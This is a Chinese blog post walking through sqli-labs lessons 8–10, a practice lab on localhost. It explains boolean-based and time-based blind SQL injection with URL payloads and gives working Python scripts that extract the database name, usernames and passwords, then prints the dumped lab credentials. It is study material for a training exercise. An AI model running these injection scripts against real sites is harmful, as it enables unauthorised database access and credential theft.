<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="SQL注入," />










<meta name="description" content="LESS 8 基于布尔的盲注盲注就是在sql注入过程中，sql语句执行的选择后，选择的数据不能回显到前端页面。此时，我们需要利用一些方法进行判断或者尝试，这个过程称之为盲注。盲注分为好几种，本关采用基于布尔的盲注 盲注相关函数：  mid(column_name,start[,length])   123456 select mid(12345,2,3);+----------------+| m">
<meta name="keywords" content="SQL注入">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli-labs less8-10">
<meta property="og:url" content="http://yoursite.com/2018/05/28/sqli-labs-less8-10/index.html">
<meta property="og:site_name" content="Lilin">
<meta property="og:description" content="LESS 8 基于布尔的盲注盲注就是在sql注入过程中，sql语句执行的选择后，选择的数据不能回显到前端页面。此时，我们需要利用一些方法进行判断或者尝试，这个过程称之为盲注。盲注分为好几种，本关采用基于布尔的盲注 盲注相关函数：  mid(column_name,start[,length])   123456 select mid(12345,2,3);+----------------+| m">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2018-05-29T13:37:50.850Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="sqli-labs less8-10">
<meta name="twitter:description" content="LESS 8 基于布尔的盲注盲注就是在sql注入过程中，sql语句执行的选择后，选择的数据不能回显到前端页面。此时，我们需要利用一些方法进行判断或者尝试，这个过程称之为盲注。盲注分为好几种，本关采用基于布尔的盲注 盲注相关函数：  mid(column_name,start[,length])   123456 select mid(12345,2,3);+----------------+| m">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/05/28/sqli-labs-less8-10/"/>





  <title>sqli-labs less8-10 | Lilin</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Lilin</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/05/28/sqli-labs-less8-10/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Lilin">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Lilin">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">sqli-labs less8-10</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-05-28T16:32:53+08:00">
                2018-05-28
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web安全/" itemprop="url" rel="index">
                    <span itemprop="name">Web安全</span>
                  </a>
                </span>

                
                
                  ， 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web安全/SQL注入/" itemprop="url" rel="index">
                    <span itemprop="name">SQL注入</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="LESS-8-基于布尔的盲注"><a href="#LESS-8-基于布尔的盲注" class="headerlink" title="LESS 8 基于布尔的盲注"></a>LESS 8 基于布尔的盲注</h1><p>盲注就是在sql注入过程中，sql语句执行的选择后，选择的数据不能回显到前端页面。此时，我们需要利用一些方法进行判断或者尝试，这个过程称之为盲注。盲注分为好几种，本关采用基于布尔的盲注</p>
<p>盲注相关函数：</p>
<ul>
<li><p>mid(column_name,start[,length])</p>
  <figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"> <span class="keyword">select</span> <span class="keyword">mid</span>(<span class="number">12345</span>,<span class="number">2</span>,<span class="number">3</span>);</span><br><span class="line">+<span class="comment">----------------+</span></span><br><span class="line">| mid(12345,2,3) |</span><br><span class="line">+<span class="comment">----------------+</span></span><br><span class="line">| 234            |</span><br><span class="line">+<span class="comment">----------------+</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>substr(string, start, length)/substring(string, start, length)</p>
<ul>
<li>这两个函数的作用和mid函数是相同的<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">substr</span>((<span class="keyword">select</span> username <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">2</span>);</span><br><span class="line">+<span class="comment">--------------------------------------------------+</span></span><br><span class="line">| substr((<span class="keyword">select</span> username <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">2</span>) |</span><br><span class="line">+<span class="comment">--------------------------------------------------+</span></span><br><span class="line">| umb                                              |</span><br><span class="line">+<span class="comment">--------------------------------------------------+</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
</ul>
<ul>
<li>Left(string, n)<ul>
<li>从左到右截取string的前n位</li>
</ul>
</li>
<li>ascii(string)<ul>
<li>返回第一个字符的ascii码值</li>
</ul>
</li>
<li>ord(string)<ul>
<li>若string第一个字符是单字节字符，则作用和ascii函数相同</li>
<li>若其为多字节，则返回如下格式：<br>((first byte ASCII code)*256+(second byte ASCII code))[*256+third byte ASCII code…]</li>
</ul>
</li>
<li>length(string)<ul>
<li>返回字符串的长度</li>
</ul>
</li>
</ul>
<a id="more"></a>
<p>回到本关，先输入单引号和双引号进行测试，发现单引号没有返回信息，于是判断参数是被单引号包围,构造payload测试数据库名的第一个字符:</p>
<blockquote>
<p><a href="http://localhost/sqli-labs-master/Less-8/?id=1&#39;" target="_blank" rel="noopener">http://localhost/sqli-labs-master/Less-8/?id=1&#39;</a> and ascii(substr(database(),1))=1%23</p>
</blockquote>
<p>无返回结果，对数据库名的每一个字符都作类似的测试，由于测试量较大，使用脚本来完成测试：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> urllib <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">from</span> urllib <span class="keyword">import</span> parse</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">url =  <span class="string">"http://localhost/sqli-labs-master/Less-8/?id="</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span>  <span class="title">length</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="string">"查询数据库名的长度"</span></span><br><span class="line">    length =  <span class="number">0</span></span><br><span class="line">    <span class="keyword">while</span>  <span class="keyword">True</span>:</span><br><span class="line">        <span class="comment">#构造动态参数并用quote函数进行url编码</span></span><br><span class="line">        param =  <span class="string">"1' and length(database())="</span>+str(length)+<span class="string">"#"</span></span><br><span class="line">        response = request.urlopen(url + parse.quote(param)).read().decode()</span><br><span class="line">        <span class="comment">#匹配成功代表长度正确</span></span><br><span class="line">        <span class="keyword">if</span> (re.search(<span class="string">"You are in..........."</span>, response)):</span><br><span class="line">            <span class="keyword">return</span> length</span><br><span class="line">        <span class="comment">#失败则加1继续循环</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            length +=  <span class="number">1</span></span><br><span class="line">    </span><br><span class="line"><span class="function"><span class="keyword">def</span>  <span class="title">database</span><span class="params">()</span>:</span></span><br><span class="line"><span class="string">"查询数据库名"</span></span><br><span class="line">    dbname =  <span class="string">""</span></span><br><span class="line">    <span class="keyword">for</span> n <span class="keyword">in</span>  range(length()):</span><br><span class="line">    <span class="comment">#对128个ascii码值进行遍历并构造动态参数</span></span><br><span class="line">        <span class="keyword">for</span> a <span class="keyword">in</span>  range(<span class="number">128</span>):</span><br><span class="line">            param =  <span class="string">"1' and ascii(substr(database(),"</span>  +  str(n+<span class="number">1</span>) +  <span class="string">"))="</span>  +  str(a) +  <span class="string">"#"</span></span><br><span class="line">            response = request.urlopen(url + parse.quote(param)).read().decode()</span><br><span class="line">            <span class="keyword">if</span> (re.search(<span class="string">"You are in..........."</span>, response)):</span><br><span class="line">                dbname = dbname +  chr(a)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">return</span> dbname</span><br><span class="line">    </span><br><span class="line">print(database())</span><br></pre></td></tr></table></figure></p>
<p>输出结果为security<br>对于函数database()可以采用时间复杂度更低的二分法：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span>  <span class="title">database</span><span class="params">()</span>:</span></span><br><span class="line"><span class="string">"查询数据库名"</span></span><br><span class="line">    dbname =  <span class="string">""</span></span><br><span class="line">    <span class="keyword">for</span> n <span class="keyword">in</span>  range(length()):</span><br><span class="line">        a, b =  <span class="number">64</span>, <span class="number">64</span></span><br><span class="line">        <span class="comment">#使用二分法构造动态参数</span></span><br><span class="line">        <span class="keyword">while</span>  <span class="keyword">True</span>:</span><br><span class="line">            b =  int(b/<span class="number">2</span>)</span><br><span class="line">            param =  <span class="string">"1' and ascii(substr(database(),"</span>  +  str(n+<span class="number">1</span>) +  <span class="string">"))&lt;"</span>  +  str(a) +  <span class="string">"#"</span></span><br><span class="line">            response = request.urlopen(url + parse.quote(param)).read().decode()</span><br><span class="line">            <span class="keyword">if</span> (re.search(<span class="string">"You are in..........."</span>, response)):</span><br><span class="line">                a -= b</span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                param =  <span class="string">"1' and ascii(substr(database(),"</span>  +  str(n+<span class="number">1</span>) +  <span class="string">"))="</span>  +  str(a) +  <span class="string">"#"</span></span><br><span class="line">                response = request.urlopen(url + parse.quote(param)).read().decode()</span><br><span class="line">                <span class="keyword">if</span> (re.search(<span class="string">"You are in..........."</span>, response)):</span><br><span class="line">                    dbname = dbname +  chr(a)</span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                a += b</span><br><span class="line">    <span class="keyword">return</span> dbname</span><br></pre></td></tr></table></figure></p>
<p>速度噌的就提上去了，数据结构果然还是要学好<br>之后我对之前的脚本做了一些修改，使其支持参数化查询，最终的盲注脚本如下：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> urllib <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">from</span> urllib <span class="keyword">import</span> parse</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://localhost/sqli-labs-master/Less-8/?id="</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getLength</span><span class="params">(value)</span>:</span></span><br><span class="line">    <span class="string">"查询数据库名的长度"</span></span><br><span class="line">    length = <span class="number">0</span></span><br><span class="line">    <span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">        <span class="comment">#构造动态参数并用quote函数进行url编码</span></span><br><span class="line">        param = <span class="string">"1' and length("</span> + value + <span class="string">")="</span>+str(length)+<span class="string">"#"</span></span><br><span class="line">        response = request.urlopen(url + parse.quote(param)).read().decode()</span><br><span class="line">        <span class="comment">#匹配成功代表长度正确</span></span><br><span class="line">        <span class="keyword">if</span> (re.search(<span class="string">"You are in..........."</span>, response)):</span><br><span class="line">            <span class="keyword">return</span> length</span><br><span class="line">        <span class="comment">#失败则加1继续循环</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            length += <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getName</span><span class="params">(value)</span>:</span></span><br><span class="line">    <span class="string">"查询数据库名"</span></span><br><span class="line">    dbname = <span class="string">""</span></span><br><span class="line">    <span class="keyword">for</span> n <span class="keyword">in</span> range(getLength(value)):</span><br><span class="line">        a = <span class="number">64</span></span><br><span class="line">        b = <span class="number">64</span></span><br><span class="line">        <span class="comment">#使用二分法构造动态参数</span></span><br><span class="line">        <span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">            b = int(b/<span class="number">2</span>)</span><br><span class="line">            param = <span class="string">"1' and ascii(substr("</span> + value + <span class="string">","</span> + str(n+<span class="number">1</span>) + <span class="string">"))&lt;"</span> + str(a) + <span class="string">"#"</span></span><br><span class="line">            response = request.urlopen(url + parse.quote(param)).read().decode()</span><br><span class="line">            <span class="keyword">if</span> (re.search(<span class="string">"You are in..........."</span>, response)):</span><br><span class="line">                a -= b</span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                param = <span class="string">"1' and ascii(substr("</span> + value + <span class="string">","</span> + str(n+<span class="number">1</span>) + <span class="string">"))="</span> + str(a) + <span class="string">"#"</span></span><br><span class="line">                response = request.urlopen(url + parse.quote(param)).read().decode()</span><br><span class="line">                <span class="keyword">if</span> (re.search(<span class="string">"You are in..........."</span>, response)):</span><br><span class="line">                    dbname = dbname + chr(a)</span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                    a += b</span><br><span class="line">    <span class="keyword">return</span> dbname</span><br><span class="line"></span><br><span class="line">print(getName(<span class="string">"(select group_concat(username) from users)"</span>))</span><br><span class="line">print(getName(<span class="string">"(select group_concat(password) from users)"</span>))</span><br></pre></td></tr></table></figure></p>
<p>输出如下，注入成功：</p>
<blockquote>
<p>Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4<br>Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4</p>
</blockquote>
<h1 id="LESS-9-基于时间的盲注"><a href="#LESS-9-基于时间的盲注" class="headerlink" title="LESS 9 基于时间的盲注"></a>LESS 9 基于时间的盲注</h1><p>和上一关不同，第八关只要没有查询到就不会显示“You are in………..”,而本关只要id是有值的就会显示“You are in………..”，没有办法通过页面显示的结果来进行盲注，所以要用到一个特殊的函数sleep(),语法如下:<br><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sleep(seconds)        #函数功能即执行延迟seconds秒</span><br></pre></td></tr></table></figure></p>
<p>还要用到的一个函数<br><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(condition, a, b)        #如果condition成立，则返回a，否则返回b</span><br></pre></td></tr></table></figure></p>
<p>举个栗子，在本关中构造这样一个payload:</p>
<blockquote>
<p><a href="http://localhost/sqli-labs-master/Less-9/?id=1&#39;" target="_blank" rel="noopener">http://localhost/sqli-labs-master/Less-9/?id=1&#39;</a> and if(1=1,sleep(3),1)%23</p>
</blockquote>
<p>在if函数中，因为1=1当然是成立的，所以执行sleep(3)，所以你会看到网页内容大概在3s后才显示出来，如果表达式不成立，网页就会立即显示出来，而1=1的位置则可以放各种表达式</p>
<p>于是，把上一关的脚本稍微改一下就成了本关的盲注脚本：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> urllib <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">from</span> urllib <span class="keyword">import</span> parse</span><br><span class="line"><span class="keyword">from</span> time <span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://localhost/sqli-labs-master/Less-9/?id="</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getLength</span><span class="params">(value)</span>:</span></span><br><span class="line">    <span class="string">"查询value长度"</span></span><br><span class="line">    length = <span class="number">0</span></span><br><span class="line">    <span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">        <span class="comment">#构造动态参数并用quote函数进行url编码</span></span><br><span class="line">        param = <span class="string">"1' and if(length("</span>+value+<span class="string">")="</span>+str(length)+<span class="string">",sleep(0.1),1)#"</span></span><br><span class="line">        t = time()      <span class="comment">#time函数获取当前时间戳</span></span><br><span class="line">        request.urlopen(url + parse.quote(param))</span><br><span class="line">        <span class="keyword">if</span> (time() - t &gt; <span class="number">0.1</span>):        <span class="comment">#时间间隔大于0.1代表长度正确</span></span><br><span class="line">            <span class="keyword">return</span> length</span><br><span class="line">        <span class="keyword">else</span>:       <span class="comment">#失败则加1继续循环</span></span><br><span class="line">            length += <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getName</span><span class="params">(value)</span>:</span></span><br><span class="line">    <span class="string">"查询value名"</span></span><br><span class="line">    dbname = <span class="string">""</span></span><br><span class="line">    <span class="keyword">for</span> n <span class="keyword">in</span> range(getLength(value)):</span><br><span class="line">        a = <span class="number">64</span></span><br><span class="line">        b = <span class="number">64</span></span><br><span class="line">        <span class="comment">#使用二分法构造动态参数</span></span><br><span class="line">        <span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">            b = int(b/<span class="number">2</span>)</span><br><span class="line">            param = <span class="string">"1' and if(ascii(substr("</span>+value+<span class="string">","</span>+str(n+<span class="number">1</span>)+<span class="string">"))&lt;"</span>+str(a)+<span class="string">",sleep(0.1),1)#"</span></span><br><span class="line">            t = time()</span><br><span class="line">            request.urlopen(url + parse.quote(param))</span><br><span class="line">            <span class="keyword">if</span> (time() - t &gt; <span class="number">0.1</span>):</span><br><span class="line">                a -= b</span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                param = <span class="string">"1' and if(ascii(substr("</span>+value+<span class="string">","</span>+str(n+<span class="number">1</span>)+<span class="string">"))="</span>+str(a)+<span class="string">",sleep(0.1),1)#"</span></span><br><span class="line">                t = time()</span><br><span class="line">                request.urlopen(url + parse.quote(param))</span><br><span class="line">                <span class="keyword">if</span> (time() - t &gt; <span class="number">0.1</span>):</span><br><span class="line">                    dbname = dbname + chr(a)</span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                    a += b</span><br><span class="line">    <span class="keyword">return</span> dbname</span><br><span class="line">    </span><br><span class="line">print(getName(<span class="string">"(select group_concat(username) from users)"</span>))</span><br><span class="line">print(getName(<span class="string">"(select group_concat(password) from users)"</span>))</span><br></pre></td></tr></table></figure></p>
<p>结果和上一关是一样的</p>
<h1 id="LESS-10-基于时间的盲注（双引号）"><a href="#LESS-10-基于时间的盲注（双引号）" class="headerlink" title="LESS 10 基于时间的盲注（双引号）"></a>LESS 10 基于时间的盲注（双引号）</h1><p>题如其名，只要把上一关绕过用的单引号改成双引号就可以盲注成功，这一关源程序和上一关应该就只是单引号双引号的区别而已</p>
<p>脚本请参照第九关</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/SQL注入/" rel="tag"># SQL注入</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/05/28/sqli-labs less2-7/" rel="next" title="sqli-labs less2-7">
                <i class="fa fa-chevron-left"></i> sqli-labs less2-7
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/05/29/sqli-labs-less11/" rel="prev" title="sqli-labs less11-16">
                sqli-labs less11-16 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/avatar.jpg"
                alt="Lilin" />
            
              <p class="site-author-name" itemprop="name">Lilin</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/soporbear" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:lilin07@foxmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#LESS-8-基于布尔的盲注"><span class="nav-number">1.</span> <span class="nav-text">LESS 8 基于布尔的盲注</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#LESS-9-基于时间的盲注"><span class="nav-number">2.</span> <span class="nav-text">LESS 9 基于时间的盲注</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#LESS-10-基于时间的盲注（双引号）"><span class="nav-number">3.</span> <span class="nav-text">LESS 10 基于时间的盲注（双引号）</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Lilin</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>
